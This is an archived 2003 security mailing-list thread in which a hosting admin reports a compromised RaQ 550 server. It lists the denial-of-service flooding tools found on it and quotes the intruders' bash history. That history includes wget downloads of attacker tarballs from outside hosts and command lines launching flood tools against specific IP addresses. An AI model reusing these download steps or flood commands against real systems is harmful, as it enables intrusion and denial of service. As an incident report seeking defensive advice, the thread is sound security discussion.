Might be a good idea to contact that owner of the box at prohosting..
----- Original Message ----- From: "Tik & Klik Internetdiensten" <[EMAIL PROTECTED]> To: <[EMAIL PROTECTED]> Sent: Monday, October 06, 2003 3:14 PM Subject: [cobalt-security] raq 550 hacked > Hello, > > this weekend it looks like a raq 550 of mine whas hacked. > i tracked some processes that was flooding. > the program was called vladimII > > it was runned on the name of a user that had ssh access. > when i blocked this user it started a day later with a nother user. > > this 2 users are from different sites on the same machine. > But these 2 users are fronm the same person. > tracking the ip's i came out in Washington > but the user is dutch so it looks like someone hacked his computer to > retreive his passwords ? > > Is there a way to look if the raq is infected or that blokking this user to > ssh will be enough > the program was russing whas in the /home/tmp dir in the map flood, a list > is below. > the file broadcast.txt has 2102 ip's in it. > > i also have saved the bash history of the 2 users. > there are several programs that was downloaded to my server. > i shorted the bash to the progroms that was downloaded below this mail > > please advice > > ---------- > -rwxr-xr-x 1 xxx users 22446 Feb 9 2001 alpha > -rwxr-xr-x 1 xxx users 23521 Aug 17 2000 bloop > -rw-r--r-- 1 xxx users 31909 Aug 22 2001 broadcast.txt > -rwxr-xr-x 1 xxx users 26981 May 9 01:10 cw > -rwxr-xr-x 1 xxx users 2250 Apr 11 2001 da.sh > -rwxr-xr-x 1 xxx users 24747 Mar 10 1996 juno > -rwxr-xr-x 1 xxx users 25285 Aug 17 2000 nestea > -rwxr-xr-x 1 xxx users 24577 Oct 3 2000 overdrop > -rwxr-xr-x 1 xxx users 22803 Oct 17 2000 rc8 > -rwxr-xr-x 1 xxx users 28910 Sep 7 2000 s > -rwxr-xr-x 1 xxx users 24786 Mar 10 1996 sl > -rwxr-xr-x 1 xxx users 17027 Feb 9 2001 sl2 > -rwxr-xr-x 1 xxx users 17027 Mar 2 2001 sl3 > -rwxr-xr-x 1 xxx users 17027 Aug 22 2001 slice2 > -rwxr-xr-x 1 xxx users 14883 May 13 2001 slice3 > -rwxr-xr-x 1 xxx users 33962 Oct 17 2000 smack > -rwxr-xr-x 1 xxx users 31558 Feb 18 2001 smurf5 > -rwxr-xr-x 1 xxx users 39382 Sep 7 2001 smurf6 > -rw-r--r-- 1 xxx users 19008 Aug 22 2001 smurf6-linux+LPG.c > -rwxr-xr-x 1 xxx users 22158 Aug 6 2000 stealth > -rwxr-xr-x 1 xxx users 15087 May 13 2001 stream > -rwxr-xr-x 1 xxx users 15151 May 13 2001 stream2 > -rwxr-xr-x 1 xxx users 23011 Jul 10 00:07 super > -rwxr-xr-x 1 xxx users 23671 May 13 2001 synhose > -rwxr-xr-x 1 xxx users 26449 Feb 7 1996 synk > -rwxr-xr-x 1 xxx users 15687 May 13 2001 synk7 > -rwxr-xr-x 1 xxx users 16519 May 13 2001 synsend > -rwxr-xr-x 1 xxx users 23587 May 13 2001 trash > -rwxr-xr-x 1 xxx users 26252 May 13 2001 trash2 > -rwxr-xr-x 1 xxx users 22741 Nov 8 2000 udp > -rwxr-xr-x 1 xxx users 22446 Aug 22 2001 vadimI > -rwxr-xr-x 1 xxx users 2635 Aug 22 2001 vadimI.c > -rwxr-xr-x 1 xxx users 23414 Jun 25 21:52 vadimII > -rwxr-xr-x 1 xxx users 13607 May 13 2001 xdestroy > -rwxr-xr-x 1 xxx users 15119 May 13 2001 xshock > > ----- > bash history > wget www.ps-lov.us/pizda.tgz > wget snow.prohosting.com/muiemuie/p.tar.gz > wget snow.prohosting.com/muiemuie/p.tgz > wget snow.prohosting.com/muiemuie/km3.tgz > wget 65.113.119.133/muiemuie/km3.tgz > > its runns programs like > ./super 69.65.48.23 53 nasa.gov > ./vadimII 210.0.204.185 53 100000000000000000000000000000000000000 0 > ./cw 210.0.204.185 > ./stealth 210.0.204.185 6500000000000 > ./super 64.207.19.6 53 nasa.gov > > > _______________________________________________ > cobalt-security mailing list > [EMAIL PROTECTED] > http://list.cobalt.com/mailman/listinfo/cobalt-security > _______________________________________________ cobalt-security mailing list [EMAIL PROTECTED] http://list.cobalt.com/mailman/listinfo/cobalt-security
